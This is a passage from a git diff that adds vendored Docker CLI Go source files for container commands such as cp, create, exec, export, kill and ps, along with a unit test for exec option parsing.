+		if err != nil {
+			return err
+		}
+		defer srcArchive.Close()
+
+		// With the stat info about the local source as well as the
+		// destination, we have enough information to know whether we need to
+		// alter the archive that we upload so that when the server extracts
+		// it to the specified directory in the container we get the desired
+		// copy behavior.
+
+		// See comments in the implementation of `archive.PrepareArchiveCopy`
+		// for exactly what goes into deciding how and whether the source
+		// archive needs to be altered for the correct copy behavior when it is
+		// extracted. This function also infers from the source and destination
+		// info which directory to extract to, which may be the parent of the
+		// destination that the user specified.
+		dstDir, preparedArchive, err := archive.PrepareArchiveCopy(srcArchive, srcInfo, dstInfo)
+		if err != nil {
+			return err
+		}
+		defer preparedArchive.Close()
+
+		resolvedDstPath = dstDir
+		content = preparedArchive
+	}
+
+	options := types.CopyToContainerOptions{
+		AllowOverwriteDirWithFile: false,
+	}
+
+	return dockerCli.Client().CopyToContainer(ctx, dstContainer, resolvedDstPath, content, options)
+}
+
+// We use `:` as a delimiter between CONTAINER and PATH, but `:` could also be
+// in a valid LOCALPATH, like `file:name.txt`. We can resolve this ambiguity by
+// requiring a LOCALPATH with a `:` to be made explicit with a relative or
+// absolute path:
+// 	`/path/to/file:name.txt` or `./file:name.txt`
+//
+// This is apparently how `scp` handles this as well:
+// 	http://www.cyberciti.biz/faq/rsync-scp-file-name-with-colon-punctuation-in-it/
+//
+// We can't simply check for a filepath separator because container names may
+// have a separator, e.g., "host0/cname1" if container is in a Docker cluster,
+// so we have to check for a `/` or `.` prefix. Also, in the case of a Windows
+// client, a `:` could be part of an absolute Windows path, in which case it
+// is immediately proceeded by a backslash.
+func splitCpArg(arg string) (container, path string) {
+	if system.IsAbs(arg) {
+		// Explicit local absolute path, e.g., `C:\foo` or `/foo`.
+		return "", arg
+	}
+
+	parts := strings.SplitN(arg, ":", 2)
+
+	if len(parts) == 1 || strings.HasPrefix(parts[0], ".") {
+		// Either there's no `:` in the arg
+		// OR it's an explicit local relative path like `./file:name.txt`.
+		return "", arg
+	}
+
+	return parts[0], parts[1]
+}
diff --git a/vendor/github.com/docker/docker/cli/command/container/create.go b/vendor/github.com/docker/docker/cli/command/container/create.go
new file mode 100644
index 0000000000..d5e63bd9ef
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/container/create.go
@@ -0,0 +1,218 @@
+package container
+
+import (
+	"fmt"
+	"io"
+	"os"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/cli/command/image"
+	"github.com/docker/docker/pkg/jsonmessage"
+	// FIXME migrate to docker/distribution/reference
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/container"
+	networktypes "github.com/docker/docker/api/types/network"
+	apiclient "github.com/docker/docker/client"
+	"github.com/docker/docker/reference"
+	"github.com/docker/docker/registry"
+	runconfigopts "github.com/docker/docker/runconfig/opts"
+	"github.com/spf13/cobra"
+	"github.com/spf13/pflag"
+)
+
+type createOptions struct {
+	name string
+}
+
+// NewCreateCommand creates a new cobra.Command for `docker create`
+func NewCreateCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts createOptions
+	var copts *runconfigopts.ContainerOptions
+
+	cmd := &cobra.Command{
+		Use:   "create [OPTIONS] IMAGE [COMMAND] [ARG...]",
+		Short: "Create a new container",
+		Args:  cli.RequiresMinArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			copts.Image = args[0]
+			if len(args) > 1 {
+				copts.Args = args[1:]
+			}
+			return runCreate(dockerCli, cmd.Flags(), &opts, copts)
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.SetInterspersed(false)
+
+	flags.StringVar(&opts.name, "name", "", "Assign a name to the container")
+
+	// Add an explicit help that doesn't have a `-h` to prevent the conflict
+	// with hostname
+	flags.Bool("help", false, "Print usage")
+
+	command.AddTrustedFlags(flags, true)
+	copts = runconfigopts.AddFlags(flags)
+	return cmd
+}
+
+func runCreate(dockerCli *command.DockerCli, flags *pflag.FlagSet, opts *createOptions, copts *runconfigopts.ContainerOptions) error {
+	config, hostConfig, networkingConfig, err := runconfigopts.Parse(flags, copts)
+	if err != nil {
+		reportError(dockerCli.Err(), "create", err.Error(), true)
+		return cli.StatusError{StatusCode: 125}
+	}
+	response, err := createContainer(context.Background(), dockerCli, config, hostConfig, networkingConfig, hostConfig.ContainerIDFile, opts.name)
+	if err != nil {
+		return err
+	}
+	fmt.Fprintf(dockerCli.Out(), "%s\n", response.ID)
+	return nil
+}
+
+func pullImage(ctx context.Context, dockerCli *command.DockerCli, image string, out io.Writer) error {
+	ref, err := reference.ParseNamed(image)
+	if err != nil {
+		return err
+	}
+
+	// Resolve the Repository name from fqn to RepositoryInfo
+	repoInfo, err := registry.ParseRepositoryInfo(ref)
+	if err != nil {
+		return err
+	}
+
+	authConfig := command.ResolveAuthConfig(ctx, dockerCli, repoInfo.Index)
+	encodedAuth, err := command.EncodeAuthToBase64(authConfig)
+	if err != nil {
+		return err
+	}
+
+	options := types.ImageCreateOptions{
+		RegistryAuth: encodedAuth,
+	}
+
+	responseBody, err := dockerCli.Client().ImageCreate(ctx, image, options)
+	if err != nil {
+		return err
+	}
+	defer responseBody.Close()
+
+	return jsonmessage.DisplayJSONMessagesStream(
+		responseBody,
+		out,
+		dockerCli.Out().FD(),
+		dockerCli.Out().IsTerminal(),
+		nil)
+}
+
+type cidFile struct {
+	path    string
+	file    *os.File
+	written bool
+}
+
+func (cid *cidFile) Close() error {
+	cid.file.Close()
+
+	if !cid.written {
+		if err := os.Remove(cid.path); err != nil {
+			return fmt.Errorf("failed to remove the CID file '%s': %s \n", cid.path, err)
+		}
+	}
+
+	return nil
+}
+
+func (cid *cidFile) Write(id string) error {
+	if _, err := cid.file.Write([]byte(id)); err != nil {
+		return fmt.Errorf("Failed to write the container ID to the file: %s", err)
+	}
+	cid.written = true
+	return nil
+}
+
+func newCIDFile(path string) (*cidFile, error) {
+	if _, err := os.Stat(path); err == nil {
+		return nil, fmt.Errorf("Container ID file found, make sure the other container isn't running or delete %s", path)
+	}
+
+	f, err := os.Create(path)
+	if err != nil {
+		return nil, fmt.Errorf("Failed to create the container ID file: %s", err)
+	}
+
+	return &cidFile{path: path, file: f}, nil
+}
+
+func createContainer(ctx context.Context, dockerCli *command.DockerCli, config *container.Config, hostConfig *container.HostConfig, networkingConfig *networktypes.NetworkingConfig, cidfile, name string) (*container.ContainerCreateCreatedBody, error) {
+	stderr := dockerCli.Err()
+
+	var containerIDFile *cidFile
+	if cidfile != "" {
+		var err error
+		if containerIDFile, err = newCIDFile(cidfile); err != nil {
+			return nil, err
+		}
+		defer containerIDFile.Close()
+	}
+
+	var trustedRef reference.Canonical
+	_, ref, err := reference.ParseIDOrReference(config.Image)
+	if err != nil {
+		return nil, err
+	}
+	if ref != nil {
+		ref = reference.WithDefaultTag(ref)
+
+		if ref, ok := ref.(reference.NamedTagged); ok && command.IsTrusted() {
+			var err error
+			trustedRef, err = image.TrustedReference(ctx, dockerCli, ref, nil)
+			if err != nil {
+				return nil, err
+			}
+			config.Image = trustedRef.String()
+		}
+	}
+
+	//create the container
+	response, err := dockerCli.Client().ContainerCreate(ctx, config, hostConfig, networkingConfig, name)
+
+	//if image not found try to pull it
+	if err != nil {
+		if apiclient.IsErrImageNotFound(err) && ref != nil {
+			fmt.Fprintf(stderr, "Unable to find image '%s' locally\n", ref.String())
+
+			// we don't want to write to stdout anything apart from container.ID
+			if err = pullImage(ctx, dockerCli, config.Image, stderr); err != nil {
+				return nil, err
+			}
+			if ref, ok := ref.(reference.NamedTagged); ok && trustedRef != nil {
+				if err := image.TagTrusted(ctx, dockerCli, trustedRef, ref); err != nil {
+					return nil, err
+				}
+			}
+			// Retry
+			var retryErr error
+			response, retryErr = dockerCli.Client().ContainerCreate(ctx, config, hostConfig, networkingConfig, name)
+			if retryErr != nil {
+				return nil, retryErr
+			}
+		} else {
+			return nil, err
+		}
+	}
+
+	for _, warning := range response.Warnings {
+		fmt.Fprintf(stderr, "WARNING: %s\n", warning)
+	}
+	if containerIDFile != nil {
+		if err = containerIDFile.Write(response.ID); err != nil {
+			return nil, err
+		}
+	}
+	return &response, nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/container/diff.go b/vendor/github.com/docker/docker/cli/command/container/diff.go
new file mode 100644
index 0000000000..12d6591014
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/container/diff.go
@@ -0,0 +1,58 @@
+package container
+
+import (
+	"fmt"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/pkg/archive"
+	"github.com/spf13/cobra"
+)
+
+type diffOptions struct {
+	container string
+}
+
+// NewDiffCommand creates a new cobra.Command for `docker diff`
+func NewDiffCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts diffOptions
+
+	return &cobra.Command{
+		Use:   "diff CONTAINER",
+		Short: "Inspect changes on a container's filesystem",
+		Args:  cli.ExactArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.container = args[0]
+			return runDiff(dockerCli, &opts)
+		},
+	}
+}
+
+func runDiff(dockerCli *command.DockerCli, opts *diffOptions) error {
+	if opts.container == "" {
+		return fmt.Errorf("Container name cannot be empty")
+	}
+	ctx := context.Background()
+
+	changes, err := dockerCli.Client().ContainerDiff(ctx, opts.container)
+	if err != nil {
+		return err
+	}
+
+	for _, change := range changes {
+		var kind string
+		switch change.Kind {
+		case archive.ChangeModify:
+			kind = "C"
+		case archive.ChangeAdd:
+			kind = "A"
+		case archive.ChangeDelete:
+			kind = "D"
+		}
+		fmt.Fprintf(dockerCli.Out(), "%s %s\n", kind, change.Path)
+	}
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/container/exec.go b/vendor/github.com/docker/docker/cli/command/container/exec.go
new file mode 100644
index 0000000000..f0381494e2
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/container/exec.go
@@ -0,0 +1,207 @@
+package container
+
+import (
+	"fmt"
+	"io"
+
+	"golang.org/x/net/context"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	apiclient "github.com/docker/docker/client"
+	options "github.com/docker/docker/opts"
+	"github.com/docker/docker/pkg/promise"
+	runconfigopts "github.com/docker/docker/runconfig/opts"
+	"github.com/spf13/cobra"
+)
+
+type execOptions struct {
+	detachKeys  string
+	interactive bool
+	tty         bool
+	detach      bool
+	user        string
+	privileged  bool
+	env         *options.ListOpts
+}
+
+func newExecOptions() *execOptions {
+	var values []string
+	return &execOptions{
+		env: options.NewListOptsRef(&values, runconfigopts.ValidateEnv),
+	}
+}
+
+// NewExecCommand creats a new cobra.Command for `docker exec`
+func NewExecCommand(dockerCli *command.DockerCli) *cobra.Command {
+	opts := newExecOptions()
+
+	cmd := &cobra.Command{
+		Use:   "exec [OPTIONS] CONTAINER COMMAND [ARG...]",
+		Short: "Run a command in a running container",
+		Args:  cli.RequiresMinArgs(2),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			container := args[0]
+			execCmd := args[1:]
+			return runExec(dockerCli, opts, container, execCmd)
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.SetInterspersed(false)
+
+	flags.StringVarP(&opts.detachKeys, "detach-keys", "", "", "Override the key sequence for detaching a container")
+	flags.BoolVarP(&opts.interactive, "interactive", "i", false, "Keep STDIN open even if not attached")
+	flags.BoolVarP(&opts.tty, "tty", "t", false, "Allocate a pseudo-TTY")
+	flags.BoolVarP(&opts.detach, "detach", "d", false, "Detached mode: run command in the background")
+	flags.StringVarP(&opts.user, "user", "u", "", "Username or UID (format: <name|uid>[:<group|gid>])")
+	flags.BoolVarP(&opts.privileged, "privileged", "", false, "Give extended privileges to the command")
+	flags.VarP(opts.env, "env", "e", "Set environment variables")
+	flags.SetAnnotation("env", "version", []string{"1.25"})
+
+	return cmd
+}
+
+func runExec(dockerCli *command.DockerCli, opts *execOptions, container string, execCmd []string) error {
+	execConfig, err := parseExec(opts, execCmd)
+	// just in case the ParseExec does not exit
+	if container == "" || err != nil {
+		return cli.StatusError{StatusCode: 1}
+	}
+
+	if opts.detachKeys != "" {
+		dockerCli.ConfigFile().DetachKeys = opts.detachKeys
+	}
+
+	// Send client escape keys
+	execConfig.DetachKeys = dockerCli.ConfigFile().DetachKeys
+
+	ctx := context.Background()
+	client := dockerCli.Client()
+
+	response, err := client.ContainerExecCreate(ctx, container, *execConfig)
+	if err != nil {
+		return err
+	}
+
+	execID := response.ID
+	if execID == "" {
+		fmt.Fprintf(dockerCli.Out(), "exec ID empty")
+		return nil
+	}
+
+	//Temp struct for execStart so that we don't need to transfer all the execConfig
+	if !execConfig.Detach {
+		if err := dockerCli.In().CheckTty(execConfig.AttachStdin, execConfig.Tty); err != nil {
+			return err
+		}
+	} else {
+		execStartCheck := types.ExecStartCheck{
+			Detach: execConfig.Detach,
+			Tty:    execConfig.Tty,
+		}
+
+		if err := client.ContainerExecStart(ctx, execID, execStartCheck); err != nil {
+			return err
+		}
+		// For now don't print this - wait for when we support exec wait()
+		// fmt.Fprintf(dockerCli.Out(), "%s\n", execID)
+		return nil
+	}
+
+	// Interactive exec requested.
+	var (
+		out, stderr io.Writer
+		in          io.ReadCloser
+		errCh       chan error
+	)
+
+	if execConfig.AttachStdin {
+		in = dockerCli.In()
+	}
+	if execConfig.AttachStdout {
+		out = dockerCli.Out()
+	}
+	if execConfig.AttachStderr {
+		if execConfig.Tty {
+			stderr = dockerCli.Out()
+		} else {
+			stderr = dockerCli.Err()
+		}
+	}
+
+	resp, err := client.ContainerExecAttach(ctx, execID, *execConfig)
+	if err != nil {
+		return err
+	}
+	defer resp.Close()
+	errCh = promise.Go(func() error {
+		return holdHijackedConnection(ctx, dockerCli, execConfig.Tty, in, out, stderr, resp)
+	})
+
+	if execConfig.Tty && dockerCli.In().IsTerminal() {
+		if err := MonitorTtySize(ctx, dockerCli, execID, true); err != nil {
+			fmt.Fprintf(dockerCli.Err(), "Error monitoring TTY size: %s\n", err)
+		}
+	}
+
+	if err := <-errCh; err != nil {
+		logrus.Debugf("Error hijack: %s", err)
+		return err
+	}
+
+	var status int
+	if _, status, err = getExecExitCode(ctx, client, execID); err != nil {
+		return err
+	}
+
+	if status != 0 {
+		return cli.StatusError{StatusCode: status}
+	}
+
+	return nil
+}
+
+// getExecExitCode perform an inspect on the exec command. It returns
+// the running state and the exit code.
+func getExecExitCode(ctx context.Context, client apiclient.ContainerAPIClient, execID string) (bool, int, error) {
+	resp, err := client.ContainerExecInspect(ctx, execID)
+	if err != nil {
+		// If we can't connect, then the daemon probably died.
+		if !apiclient.IsErrConnectionFailed(err) {
+			return false, -1, err
+		}
+		return false, -1, nil
+	}
+
+	return resp.Running, resp.ExitCode, nil
+}
+
+// parseExec parses the specified args for the specified command and generates
+// an ExecConfig from it.
+func parseExec(opts *execOptions, execCmd []string) (*types.ExecConfig, error) {
+	execConfig := &types.ExecConfig{
+		User:       opts.user,
+		Privileged: opts.privileged,
+		Tty:        opts.tty,
+		Cmd:        execCmd,
+		Detach:     opts.detach,
+	}
+
+	// If -d is not set, attach to everything by default
+	if !opts.detach {
+		execConfig.AttachStdout = true
+		execConfig.AttachStderr = true
+		if opts.interactive {
+			execConfig.AttachStdin = true
+		}
+	}
+
+	if opts.env != nil {
+		execConfig.Env = opts.env.GetAll()
+	}
+
+	return execConfig, nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/container/exec_test.go b/vendor/github.com/docker/docker/cli/command/container/exec_test.go
new file mode 100644
index 0000000000..baeeaf1904
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/container/exec_test.go
@@ -0,0 +1,116 @@
+package container
+
+import (
+	"testing"
+
+	"github.com/docker/docker/api/types"
+)
+
+type arguments struct {
+	options execOptions
+	execCmd []string
+}
+
+func TestParseExec(t *testing.T) {
+	valids := map[*arguments]*types.ExecConfig{
+		&arguments{
+			execCmd: []string{"command"},
+		}: {
+			Cmd:          []string{"command"},
+			AttachStdout: true,
+			AttachStderr: true,
+		},
+		&arguments{
+			execCmd: []string{"command1", "command2"},
+		}: {
+			Cmd:          []string{"command1", "command2"},
+			AttachStdout: true,
+			AttachStderr: true,
+		},
+		&arguments{
+			options: execOptions{
+				interactive: true,
+				tty:         true,
+				user:        "uid",
+			},
+			execCmd: []string{"command"},
+		}: {
+			User:         "uid",
+			AttachStdin:  true,
+			AttachStdout: true,
+			AttachStderr: true,
+			Tty:          true,
+			Cmd:          []string{"command"},
+		},
+		&arguments{
+			options: execOptions{
+				detach: true,
+			},
+			execCmd: []string{"command"},
+		}: {
+			AttachStdin:  false,
+			AttachStdout: false,
+			AttachStderr: false,
+			Detach:       true,
+			Cmd:          []string{"command"},
+		},
+		&arguments{
+			options: execOptions{
+				tty:         true,
+				interactive: true,
+				detach:      true,
+			},
+			execCmd: []string{"command"},
+		}: {
+			AttachStdin:  false,
+			AttachStdout: false,
+			AttachStderr: false,
+			Detach:       true,
+			Tty:          true,
+			Cmd:          []string{"command"},
+		},
+	}
+
+	for valid, expectedExecConfig := range valids {
+		execConfig, err := parseExec(&valid.options, valid.execCmd)
+		if err != nil {
+			t.Fatal(err)
+		}
+		if !compareExecConfig(expectedExecConfig, execConfig) {
+			t.Fatalf("Expected [%v] for %v, got [%v]", expectedExecConfig, valid, execConfig)
+		}
+	}
+}
+
+func compareExecConfig(config1 *types.ExecConfig, config2 *types.ExecConfig) bool {
+	if config1.AttachStderr != config2.AttachStderr {
+		return false
+	}
+	if config1.AttachStdin != config2.AttachStdin {
+		return false
+	}
+	if config1.AttachStdout != config2.AttachStdout {
+		return false
+	}
+	if config1.Detach != config2.Detach {
+		return false
+	}
+	if config1.Privileged != config2.Privileged {
+		return false
+	}
+	if config1.Tty != config2.Tty {
+		return false
+	}
+	if config1.User != config2.User {
+		return false
+	}
+	if len(config1.Cmd) != len(config2.Cmd) {
+		return false
+	}
+	for index, value := range config1.Cmd {
+		if value != config2.Cmd[index] {
+			return false
+		}
+	}
+	return true
+}
diff --git a/vendor/github.com/docker/docker/cli/command/container/export.go b/vendor/github.com/docker/docker/cli/command/container/export.go
new file mode 100644
index 0000000000..8fa2e5d77e
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/container/export.go
@@ -0,0 +1,59 @@
+package container
+
+import (
+	"errors"
+	"io"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/spf13/cobra"
+)
+
+type exportOptions struct {
+	container string
+	output    string
+}
+
+// NewExportCommand creates a new `docker export` command
+func NewExportCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts exportOptions
+
+	cmd := &cobra.Command{
+		Use:   "export [OPTIONS] CONTAINER",
+		Short: "Export a container's filesystem as a tar archive",
+		Args:  cli.ExactArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.container = args[0]
+			return runExport(dockerCli, opts)
+		},
+	}
+
+	flags := cmd.Flags()
+
+	flags.StringVarP(&opts.output, "output", "o", "", "Write to a file, instead of STDOUT")
+
+	return cmd
+}
+
+func runExport(dockerCli *command.DockerCli, opts exportOptions) error {
+	if opts.output == "" && dockerCli.Out().IsTerminal() {
+		return errors.New("Cowardly refusing to save to a terminal. Use the -o flag or redirect.")
+	}
+
+	clnt := dockerCli.Client()
+
+	responseBody, err := clnt.ContainerExport(context.Background(), opts.container)
+	if err != nil {
+		return err
+	}
+	defer responseBody.Close()
+
+	if opts.output == "" {
+		_, err := io.Copy(dockerCli.Out(), responseBody)
+		return err
+	}
+
+	return command.CopyToFile(opts.output, responseBody)
+}
diff --git a/vendor/github.com/docker/docker/cli/command/container/hijack.go b/vendor/github.com/docker/docker/cli/command/container/hijack.go
new file mode 100644
index 0000000000..ca136f0e43
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/container/hijack.go
@@ -0,0 +1,116 @@
+package container
+
+import (
+	"io"
+	"runtime"
+	"sync"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/pkg/stdcopy"
+	"golang.org/x/net/context"
+)
+
+// holdHijackedConnection handles copying input to and output from streams to the
+// connection
+func holdHijackedConnection(ctx context.Context, streams command.Streams, tty bool, inputStream io.ReadCloser, outputStream, errorStream io.Writer, resp types.HijackedResponse) error {
+	var (
+		err         error
+		restoreOnce sync.Once
+	)
+	if inputStream != nil && tty {
+		if err := setRawTerminal(streams); err != nil {
+			return err
+		}
+		defer func() {
+			restoreOnce.Do(func() {
+				restoreTerminal(streams, inputStream)
+			})
+		}()
+	}
+
+	receiveStdout := make(chan error, 1)
+	if outputStream != nil || errorStream != nil {
+		go func() {
+			// When TTY is ON, use regular copy
+			if tty && outputStream != nil {
+				_, err = io.Copy(outputStream, resp.Reader)
+				// we should restore the terminal as soon as possible once connection end
+				// so any following print messages will be in normal type.
+				if inputStream != nil {
+					restoreOnce.Do(func() {
+						restoreTerminal(streams, inputStream)
+					})
+				}
+			} else {
+				_, err = stdcopy.StdCopy(outputStream, errorStream, resp.Reader)
+			}
+
+			logrus.Debug("[hijack] End of stdout")
+			receiveStdout <- err
+		}()
+	}
+
+	stdinDone := make(chan struct{})
+	go func() {
+		if inputStream != nil {
+			io.Copy(resp.Conn, inputStream)
+			// we should restore the terminal as soon as possible once connection end
+			// so any following print messages will be in normal type.
+			if tty {
+				restoreOnce.Do(func() {
+					restoreTerminal(streams, inputStream)
+				})
+			}
+			logrus.Debug("[hijack] End of stdin")
+		}
+
+		if err := resp.CloseWrite(); err != nil {
+			logrus.Debugf("Couldn't send EOF: %s", err)
+		}
+		close(stdinDone)
+	}()
+
+	select {
+	case err := <-receiveStdout:
+		if err != nil {
+			logrus.Debugf("Error receiveStdout: %s", err)
+			return err
+		}
+	case <-stdinDone:
+		if outputStream != nil || errorStream != nil {
+			select {
+			case err := <-receiveStdout:
+				if err != nil {
+					logrus.Debugf("Error receiveStdout: %s", err)
+					return err
+				}
+			case <-ctx.Done():
+			}
+		}
+	case <-ctx.Done():
+	}
+
+	return nil
+}
+
+func setRawTerminal(streams command.Streams) error {
+	if err := streams.In().SetRawTerminal(); err != nil {
+		return err
+	}
+	return streams.Out().SetRawTerminal()
+}
+
+func restoreTerminal(streams command.Streams, in io.Closer) error {
+	streams.In().RestoreTerminal()
+	streams.Out().RestoreTerminal()
+	// WARNING: DO NOT REMOVE THE OS CHECK !!!
+	// For some reason this Close call blocks on darwin..
+	// As the client exists right after, simply discard the close
+	// until we find a better solution.
+	if in != nil && runtime.GOOS != "darwin" {
+		return in.Close()
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/container/inspect.go b/vendor/github.com/docker/docker/cli/command/container/inspect.go
new file mode 100644
index 0000000000..08a8d244df
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/container/inspect.go
@@ -0,0 +1,47 @@
+package container
+
+import (
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/cli/command/inspect"
+	"github.com/spf13/cobra"
+)
+
+type inspectOptions struct {
+	format string
+	size   bool
+	refs   []string
+}
+
+// newInspectCommand creates a new cobra.Command for `docker container inspect`
+func newInspectCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts inspectOptions
+
+	cmd := &cobra.Command{
+		Use:   "inspect [OPTIONS] CONTAINER [CONTAINER...]",
+		Short: "Display detailed information on one or more containers",
+		Args:  cli.RequiresMinArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.refs = args
+			return runInspect(dockerCli, opts)
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template")
+	flags.BoolVarP(&opts.size, "size", "s", false, "Display total file sizes")
+
+	return cmd
+}
+
+func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error {
+	client := dockerCli.Client()
+	ctx := context.Background()
+
+	getRefFunc := func(ref string) (interface{}, []byte, error) {
+		return client.ContainerInspectWithRaw(ctx, ref, opts.size)
+	}
+	return inspect.Inspect(dockerCli.Out(), opts.refs, opts.format, getRefFunc)
+}
diff --git a/vendor/github.com/docker/docker/cli/command/container/kill.go b/vendor/github.com/docker/docker/cli/command/container/kill.go
new file mode 100644
index 0000000000..6da91a40e3
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/container/kill.go
@@ -0,0 +1,56 @@
+package container
+
+import (
+	"fmt"
+	"strings"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/spf13/cobra"
+)
+
+type killOptions struct {
+	signal string
+
+	containers []string
+}
+
+// NewKillCommand creates a new cobra.Command for `docker kill`
+func NewKillCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts killOptions
+
+	cmd := &cobra.Command{
+		Use:   "kill [OPTIONS] CONTAINER [CONTAINER...]",
+		Short: "Kill one or more running containers",
+		Args:  cli.RequiresMinArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.containers = args
+			return runKill(dockerCli, &opts)
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.StringVarP(&opts.signal, "signal", "s", "KILL", "Signal to send to the container")
+	return cmd
+}
+
+func runKill(dockerCli *command.DockerCli, opts *killOptions) error {
+	var errs []string
+	ctx := context.Background()
+	errChan := parallelOperation(ctx, opts.containers, func(ctx context.Context, container string) error {
+		return dockerCli.Client().ContainerKill(ctx, container, opts.signal)
+	})
+	for _, name := range opts.containers {
+		if err := <-errChan; err != nil {
+			errs = append(errs, err.Error())
+		} else {
+			fmt.Fprintf(dockerCli.Out(), "%s\n", name)
+		}
+	}
+	if len(errs) > 0 {
+		return fmt.Errorf("%s", strings.Join(errs, "\n"))
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/container/list.go b/vendor/github.com/docker/docker/cli/command/container/list.go
new file mode 100644
index 0000000000..5bbf41966d
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/container/list.go
@@ -0,0 +1,141 @@
+package container
+
+import (
+	"io/ioutil"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/cli/command/formatter"
+	"github.com/docker/docker/opts"
+	"github.com/docker/docker/utils/templates"
+	"github.com/spf13/cobra"
+)
+
+type psOptions struct {
+	quiet   bool
+	size    bool
+	all     bool
+	noTrunc bool
+	nLatest bool
+	last    int
+	format  string
+	filter  opts.FilterOpt
+}
+
+// NewPsCommand creates a new cobra.Command for `docker ps`
+func NewPsCommand(dockerCli *command.DockerCli) *cobra.Command {
+	opts := psOptions{filter: opts.NewFilterOpt()}
+
+	cmd := &cobra.Command{
+		Use:   "ps [OPTIONS]",
+		Short: "List containers",
+		Args:  cli.NoArgs,
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return runPs(dockerCli, &opts)
+		},
+	}
+
+	flags := cmd.Flags()
+
+	flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display numeric IDs")
+	flags.BoolVarP(&opts.size, "size", "s", false, "Display total file sizes")
+	flags.BoolVarP(&opts.all, "all", "a", false, "Show all containers (default shows just running)")
+	flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Don't truncate output")
+	flags.BoolVarP(&opts.nLatest, "latest", "l", false, "Show the latest created container (includes all states)")
+	flags.IntVarP(&opts.last, "last", "n", -1, "Show n last created containers (includes all states)")
+	flags.StringVarP(&opts.format, "format", "", "", "Pretty-print containers using a Go template")
+	flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided")
+
+	return cmd
+}
+
+func newListCommand(dockerCli *command.DockerCli) *cobra.Command {
+	cmd := *NewPsCommand(dockerCli)
+	cmd.Aliases = []string{"ps", "list"}
+	cmd.Use = "ls [OPTIONS]"
+	return &cmd
+}
+
+// listOptionsProcessor is used to set any container list options which may only
+// be embedded in the format template.
+// This is passed directly into tmpl.Execute in order to allow the preprocessor
+// to set any list options that were not provided by flags (e.g. `.Size`).
+// It is using a `map[string]bool` so that unknown fields passed into the
+// template format do not cause errors. These errors will get picked up when
+// running through the actual template processor.
+type listOptionsProcessor map[string]bool
+
+// Size sets the size of the map when called by a template execution.
+func (o listOptionsProcessor) Size() bool {
+	o["size"] = true
+	return true
+}
+
+// Label is needed here as it allows the correct pre-processing
+// because Label() is a method with arguments
+func (o listOptionsProcessor) Label(name string) string {
+	return ""
+}
+
+func buildContainerListOptions(opts *psOptions) (*types.ContainerListOptions, error) {
+	options := &types.ContainerListOptions{
+		All:     opts.all,
+		Limit:   opts.last,
+		Size:    opts.size,
+		Filters: opts.filter.Value(),
+	}
+
+	if opts.nLatest && opts.last == -1 {
+		options.Limit = 1
+	}
+
+	tmpl, err := templates.Parse(opts.format)
+
+	if err != nil {
+		return nil, err
+	}
+
+	optionsProcessor := listOptionsProcessor{}
+	// This shouldn't error out but swallowing the error makes it harder
+	// to track down if preProcessor issues come up. Ref #24696
+	if err := tmpl.Execute(ioutil.Discard, optionsProcessor); err != nil {
+		return nil, err
+	}
+	// At the moment all we need is to capture .Size for preprocessor
+	options.Size = opts.size || optionsProcessor["size"]
+
+	return options, nil
+}
+
+func runPs(dockerCli *command.DockerCli, opts *psOptions) error {
+	ctx := context.Background()
+
+	listOptions, err := buildContainerListOptions(opts)
+	if err != nil {
+		return err
+	}
+
+	containers, err := dockerCli.Client().ContainerList(ctx, *listOptions)
+	if err != nil {
+		return err
+	}
+
+	format := opts.format
+	if len(format) == 0 {
